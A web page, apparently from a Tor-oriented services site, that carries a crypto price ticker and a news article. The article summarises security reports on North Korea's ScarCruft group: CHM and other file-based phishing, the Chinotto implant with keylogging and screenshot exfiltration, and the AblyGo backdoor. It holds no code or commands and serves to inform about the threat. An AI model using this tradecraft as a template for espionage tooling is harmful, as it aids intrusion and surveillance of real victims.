BTC $56772.0455
ETH $3229.2692
BNB $393.0365
SOL $106.6536
stETH $3224.6597
XRP $0.5621
ADA $0.6137
AVAX $38.6261
DOGE $0.0960
TRX $0.1415
wstETH $3753.2551
DOT $8.0619
LINK $18.8685
WETH $3222.5827
MATIC $1.0217
UNI $10.5943
WBTC $56672.8182
IMX $3.2827
ICP $12.8638
BCH $296.0952
LTC $73.4211
CAKE $3.1049
LEO $4.3751
ETC $27.6986
FIL $7.7121
KAS $0.1681
RNDR $7.1714
DAI $0.9992
HBAR $0.1085
ATOM $10.9103
INJ $37.3719
VET $0.0480
TON $2.1032
OKB $51.5043
FDUSD $1.0007
LDO $3.4620
STX $3.0518
XMR $133.5710
ARB $1.8885
XLM $0.1189
GRT $0.2844
TIA $16.9400
NEAR $3.9210
ENS $21.6903
MKR $2126.5962
WEMIX $2.0704
APEX $2.3723
BTC $56772.0455
ETH $3229.2692
BNB $393.0365
SOL $106.6536
stETH $3224.6597
XRP $0.5621
ADA $0.6137
AVAX $38.6261
DOGE $0.0960
TRX $0.1415
wstETH $3753.2551
DOT $8.0619
LINK $18.8685
WETH $3222.5827
MATIC $1.0217
UNI $10.5943
WBTC $56672.8182
IMX $3.2827
ICP $12.8638
BCH $296.0952
LTC $73.4211
CAKE $3.1049
LEO $4.3751
ETC $27.6986
FIL $7.7121
KAS $0.1681
RNDR $7.1714
DAI $0.9992
HBAR $0.1085
ATOM $10.9103
INJ $37.3719
VET $0.0480
TON $2.1032
OKB $51.5043
FDUSD $1.0007
LDO $3.4620
STX $3.0518
XMR $133.5710
ARB $1.8885
XLM $0.1189
GRT $0.2844
TIA $16.9400
NEAR $3.9210
ENS $21.6903
MKR $2126.5962
WEMIX $2.0704
APEX $2.3723
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • New backdoor distribution method revealed

    North Korean APT group ScarCruft uses Microsoft Compiled HTML Help (CHM) files to download additional malware onto target machines.

    The ScarCruft group (APT37, Reaper, RedEyes and Ricochet Chollima) has been actively attacking various South Korean organizations since the beginning of 2023 for espionage purposes. The group is known to have been active since at least 2012.

    According to multiple reports from the AhnLab Security Emergency Response Center (ASEC), SEKOIA.IO, and Zscaler, the group's new tactics illustrate the ongoing efforts of hackers to improve and retool their attacks to bypass detection.

    According to experts, in the discovered campaign, hackers use the "CHM", "HTA", "LNK", "XLL" file formats, and Microsoft Office documents with macros in their targeted phishing attacks against South Korea.

    The infection chains display a honey file and deploy an updated version of a PowerShell-based implant called Chinotto that is capable of executing commands sent by the C2 server and extracting sensitive data.

    Some of Chinotto's new features include taking screenshots every 5 seconds and logging keystrokes. The collected information is then stored in a ZIP archive and sent to a remote server.

    Information about various ScarCruft attack vectors comes from a GitHub repository that has been maintained by attackers to host malicious payloads since October 2020.

    In addition to spreading malware, ScarCruft also hosts phishing web pages from email and cloud services such as Naver, iCloud, Kakao, Mail.ru, and 163.com.

    It is unclear how victims access these pages. Most likely, the phishing forms could have been embedded in "iframes" on compromised hacker-controlled sites, or sent as HTML email attachments.

    SEKOIA.IO also discovered a backdoor called AblyGo written in Golang that uses the Ably messaging platform to receive commands.

    ScarCruft is not the only group from North Korea that is conducting spy campaigns against targets from South Korea. So, earlier it became known that North Korean government hackers Kimsuki spied on South Korean journalists using an infected Android application as part of a social engineering campaign.

    Author DeepWeb
    Nexus gaining popularity in hacker forums
    Hackers posted part of the Twitter source code on GitHub

    Comments 0

    Add comment